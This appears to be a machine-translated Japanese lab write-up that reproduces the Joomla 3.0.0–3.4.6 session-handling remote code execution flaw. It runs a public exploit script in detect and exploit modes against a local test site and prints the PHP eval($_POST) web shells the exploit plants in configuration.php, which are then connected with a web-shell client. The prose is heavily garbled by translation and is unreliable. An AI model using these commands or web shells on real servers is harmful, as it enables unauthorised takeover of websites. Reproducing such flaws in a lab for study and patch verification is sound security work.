CMS導入は0x00
Joomla!のは、世界的に有名なコンテンツ管理システムです。Joomla!のPHP言語に加えて開発した、MySQLデータベース・ソフトウェア・システムを使用して、最新バージョンは3.9.11です。これは、異なる様々なプラットフォームのLinux、Windowsの、MacOSXの上と上のように実行することができます。現在、世界中のオープンソース物質によってすべてのオープンソース開発とサポート体制、この組織のメンバーを実施し、開発者、設計者、システム管理者、文書の作成者を含む約150人のグループのメンバー、および2つ以上1万メンバーが参加。
2012年以来、表彰式が始まった、長年のJoomla CMSの賞はチャンピオンになるために。2015、2016、2017、2018年のグローバル評価でCMSに続き、再び「ベストオープンソースCMS」賞を受賞しました!
0x01の脆弱性プロファイル
- アレッサンドロGroppo @Hacktiveセキュリティを悪用し、デシベル(https://www.exploit-db.com/exploits/47465)で実行したコマンドEXP Joomlaの2019年10月2日にリリースされ、本質的に誤った取り扱いJoomlaのセッションデータのための抜け穴であります不正な攻撃者は、許可サーバ、リモートコマンド実行を得るために、悪意のある細工されたHTTPリクエストを送信することができます。
- 効果範囲:3.0.0 <= Joomlaの<= 3.4.6
ビルドに0x02の環境
私はphpstudyビルドを使用
//downloads.joomla.org/it/cms/joomla3/3-4-6ます。https:Joomlaのダウンロードを
正常にインストール、次のホームの後
0x03の再現性のある脆弱性
EXP:HTTPS://github.com/kiks7/rusty_joomla_rce
1.脆弱性の検出
python rusty_joomla_exploit.py -t http://quan.joomla346.net/ -c
結果は以下のとおりで、脆弱な証拠抜け穴があるされている
2エクスプロイト
rusty_joomla_rce-master>python rusty_joomla_exploit.py -t http://quan.joomla346.net/ -e -l quan.joomla346.net -p 80
Configuration.phpは、書かれた言葉トロイの木馬(ここで私はいくつかありますが、数回以上実行)で見ることができます
if(isset($_POST['epgijbodvzllittceoyidpbbglcdawduhyvqqtdndfxjfivvkg'])) eval($_POST['epgijbodvzllittceoyidpbbglcdawduhyvqqtdndfxjfivvkg']);if(isset($_POST['bhjhofjrtfrlskgaufapblryaqymfzrrbaoluyljwgekkoakhm'])) eval($_POST['bhjhofjrtfrlskgaufapblryaqymfzrrbaoluyljwgekkoakhm']);if(isset($_POST['dzyxxxhejymxvidysrisgguzvbehpuudwgkwcgldarnnlkxgbj'])) eval($_POST['dzyxxxhejymxvidysrisgguzvbehpuudwgkwcgldarnnlkxgbj']);
包丁との接続
0x04のバグ修正
公式サイトの最新バージョンへのアップデート
0x05のリファレンス
https://mp.weixin.qq.com/s/1LJJG-whv1vUfaWDSfA2gg